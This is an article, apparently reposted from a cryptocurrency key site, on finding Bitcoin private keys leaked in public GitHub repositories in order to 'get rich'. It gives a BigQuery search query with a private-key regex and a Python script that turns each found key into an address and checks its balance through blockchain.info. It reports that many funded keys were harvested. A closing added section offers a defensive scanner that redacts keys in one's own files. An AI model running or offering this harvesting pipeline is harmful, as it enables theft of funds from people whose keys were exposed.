Leaked keys from GitHub
People sometimes do not care about the security of their own information, and sometimes they are simply inattentive and make mistakes while doing routine work every day. They leak material in GitHub repositories all the time. These files may include SSH private keys, national ID scans, credit card information, passwords, etc. Maybe we can find some Bitcoin private keys and get rich!? Let's try.
Searching for Bitcoins in GitHub repositories with Google BigQuery
Tools:
Google BigQuery: https://cloud.google.com/bigquery/
https://cloud.google.com/bigquery/public-data/github
Crafted Query for BigQuery code:
SELECT
  f.repo_name,
  f.path,
  c.pkey
FROM
  [bigquery-public-data:github_repos.files] f
-- Query all matches for id that fits the key parameters.
JOIN (
  SELECT
    id,
    REGEXP_EXTRACT(content, r'(?:^|[^a-zA-Z0-9])(5[HJK][123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ]{48,49})(?:$|[^a-zA-Z0-9])') AS pkey
  FROM
    [bigquery-public-data:github_repos.contents]
  WHERE
    REGEXP_MATCH(content, r'(?:^|[^a-zA-Z0-9])(5[HJK][123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ]{48,49})(?:$|[^a-zA-Z0-9])') ) c
ON
  f.id = c.id
Python Script for Validating BTC Addresses:
import time

import requests
from pybitcoin import BitcoinPrivateKey

# Collect the unique candidate keys from the exported query results.
keys = set()
with open('results.csv') as f:
    for line in f.read().split('\n'):
        if line:
            repo, file, pkey = line.split(",")
            keys.add(pkey)

for priv in keys:
    try:
        # Raises if the string is not a valid private key.
        p = BitcoinPrivateKey(priv)
        pub = p.public_key().address()
        r = requests.get("https://blockchain.info/rawaddr/{}".format(pub))
        time.sleep(1)  # pause between API requests
        print('{} {} {:20} {:20} {:20}'.format(priv, pub,
                                               r.json()['final_balance'],
                                               r.json()['total_received'],
                                               r.json()['total_sent']))
    except (AssertionError, IndexError):
        # Not a valid key; skip it.
        pass
    except ValueError:
        # The response was not valid JSON; show what came back.
        print(r)
        print(r.text)
Or you can use a regular expression for Bitcoin private keys:
^5[HJK][1-9A-Za-z][^OIl]{49}
This script got a lot of private keys from GitHub. After harvesting, it was not a problem to check the Bitcoin balances. These keys have Bitcoin balances, and some have Bitcoin Cash. As far as we know, access to the GitHub database is now closed. And we will try to parse each page with a regular expression.
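The same pattern, combined with a Base58Check checksum test, lets a repository owner catch such a key in their own files before it is pushed. This is an added example (Python 3, standard library only), not code from the original article; the function names and the sample input are constructed for illustration.

```python
import hashlib
import re

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# 51-character uncompressed WIF that is not part of a longer alphanumeric token.
CANDIDATE = re.compile(r"(?<![a-zA-Z0-9])5[HJK][%s]{49}(?![a-zA-Z0-9])" % B58)

def checksum(payload):
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]

def wif_encode(key32):
    """Helper used only to build the constructed sample below."""
    raw = b"\x80" + key32
    n, out = int.from_bytes(raw + checksum(raw), "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return out

def is_wif(token):
    """True if token decodes to 0x80 + 32 key bytes + a matching 4-byte checksum."""
    if not CANDIDATE.fullmatch(token):
        return False
    n = 0
    for ch in token:
        n = n * 58 + B58.index(ch)
    raw = n.to_bytes(37, "big")
    return raw[0] == 0x80 and checksum(raw[:33]) == raw[33:]

def scan(text):
    """Return (line_number, redacted_key) for every checksum-valid key in text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in CANDIDATE.finditer(line):
            if is_wif(m.group()):
                hits.append((no, m.group()[:4] + "..." + m.group()[-2:]))
    return hits

# Constructed sample input: one correctly formed key, one lookalike with a bad
# checksum, and one key-shaped run embedded in a longer token.
SAMPLE_KEY = wif_encode(bytes(range(1, 33)))
BAD = SAMPLE_KEY[:-1] + ("2" if SAMPLE_KEY[-1] != "2" else "3")
SAMPLE = "\n".join(["# settings (constructed)", "wallet_key=" + SAMPLE_KEY,
                    "note=" + BAD, "id=x" + SAMPLE_KEY])

if __name__ == "__main__":
    for no, key in scan(SAMPLE):
        print("line %d: possible Bitcoin private key %s" % (no, key))
```

The checksum step removes random 51-character strings that merely match the pattern, and the report shows only a redacted form so the scanner's own output does not become another copy of the key.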
Original article: https://allprivatekeys.com/leaked-keys-from-github.php